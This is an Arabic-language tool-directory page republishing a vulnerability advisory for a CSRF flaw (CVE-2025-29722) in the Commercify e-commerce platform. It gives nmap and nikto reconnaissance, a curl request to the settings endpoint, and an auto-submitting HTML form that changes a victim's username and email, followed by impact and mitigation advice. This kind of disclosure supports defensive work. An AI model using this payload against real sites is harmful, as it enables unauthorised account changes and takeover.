Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/cypherdavy/cve-2025-29722
الاستطلاعتحليل الثغرات الأمنيةاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubcypherdavy/cve-2025-29722

CVE-2025-29722

تزوير الطلب عبر المواقع (CSRF) في Commercify v1.0

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
CVE-2025-29722 — تزوير الطلب عبر المواقع (CSRF) في Commercify v1.0 | Kitploit

🛡️ CVE-2025-29722 – تزوير الطلب عبر المواقع (CSRF) في Commercify الإصدار 1.0

اكتشفه: David P.S Abraham (المعروف بـ Davycipher)


معرف CVE

CVE-2025-29722 تم تعيينه لهذه الثغرة الأمنية بواسطة MITRE Corporation.


ملخص

تم تحديد ثغرة CSRF في Commercify الإصدار 1.0، وهي منصة تجارة إلكترونية مفتوحة المصدر طورها @yassmittal. يفتقر التطبيق إلى آليات حماية مناسبة من CSRF على نقاط النهاية الحيوية مثل /update_settings، مما يسمح للمهاجمين بتكوين طلبات ضارة لتعديل بيانات المستخدم عند تنفيذها من نطاق آخر.


المنتج المتأثر

  • اسم المنتج: Commercify
  • الإصدار: 1.0
  • المستودع: https://github.com/yassmittal/Commercify

نوع الثغرة

  • CWE-352: تزوير الطلب عبر المواقع (CSRF)

شرح الاستغلال

مرحلة الاستطلاع

كشف فحص nmap أن الخدمة كانت متاحة عبر المنفذ 5173، مما يشير إلى وجود خادم تطوير محتمل.

root@kitploit:~
nmap -p 5173 localhost

بعد ذلك، قمت بمسح التطبيق باستخدام nikto، وكشف ما يلي:

  • عدم وجود رأس X-Frame-Options
  • سياسة CORS متساهلة (Access-Control-Allow-Origin: *)
  • عدم وجود رؤوس حماية CSRF

هجوم تخمين نقطة النهاية

أثناء استكشاف التطبيق، اشتبهت في وجود نقطة نهاية update_settings بناءً على ميزات لوحة تحكم المستخدم. اختبرتها باستخدام:

root@kitploit:~
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"

على الرغم من إرجاع 404 Not Found، إلا أن هذا السلوك يعتمد على البيئة. في النشرات الصالحة، قد يؤدي ذلك إلى التلاعب الكامل بالحساب.


إثبات المفهوم (PoC)

هجوم قائم على HTML لاستغلال ثغرة CSRF:

root@kitploit:~
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="[email protected]">
</form>
<script>
  document.forms[0].submit();
</script>

التأثير

  • تغييرات غير مصرح بها في بيانات حساب المستخدم
  • رفع الصلاحيات إذا تضمنت الإعدادات تعديل الدور أو البريد الإلكتروني
  • سيناريوهات الاستيلاء على الحساب

السبب الجذري

  • عدم وجود رموز مميزة لـ CSRF
  • عدم وجود خاصية SameSite على الكوكيز
  • سياسة CORS متساهلة (*)
  • عدم التحقق من المرجع أو المصدر

التخفيف والتوصيات

  • إضافة رموز مميزة لـ CSRF لجميع نقاط النهاية التي تغير الحالة
  • تعيين SameSite=Strict أو Lax على الكوكيز
  • تحديد سياسات CORS صارمة
  • تنفيذ التحقق من المرجع/المصدر

المكتشف

David P.S. Abraham
الاسم المستعار: Davycipher

  • GitHub
  • LinkedIn
  • Website
تنزيل الأداة